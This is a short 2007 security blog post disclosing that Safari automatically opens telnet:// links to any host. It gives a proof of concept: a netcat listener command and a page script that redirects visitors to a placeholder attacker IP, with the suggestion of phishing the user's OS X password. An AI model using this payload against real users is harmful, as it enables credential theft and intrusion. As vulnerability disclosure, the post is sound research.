Safari security

Back to articles

hackvertor

Author:

Gareth Heyes

@hackvertor

Published: Fri, 16 Nov 2007 11:05:23 GMT

Updated: Sat, 22 Mar 2025 15:38:07 GMT

Well what do you do when you report a bug to Apple and the deny it is even a problem?

Turn it into a remote one.

What do you do when they don't provide you with any credit whatsoever? Give up? Stop testing Safari? Or drink lots of coffee and red bull, stay up all night hacking the hell out of their browser? I went for the last one :) You see Apple I don't really care if you don't provide me credit or not I just like hacking browsers :P

Ok onto the fun. Apple seem to have some sort of security related breakdown because they allow the telnet protocol. On top of that they allow it to automatically connect and to any address. Yeah crazy eh? Can you see where this is going? :) Take the following simple example:-

The attacker opens up a terminal on any remote machine:- nc -vv -l -p 3000

The above command listens for incoming connections on port 3000. The attacker then tricks a user to visiting their evil web page:-

<pre lang="javascript"> &lt;script type=&quot;text/javascript&quot;&gt; // x.x.x.x = attackers remote ip self.location = 'telnet://x.x.x.x:3000'; &lt;/script&gt; </pre>

A connection is then established between the user and the attacker, the attacker can prompt the user to enter their OS X password etc, it may be even possible to execute a interactive shell. All not good I'm sure you'll agree.

To make Safari secure simply select the Safari icon in applications and drag it to the waste bin.

Back to articles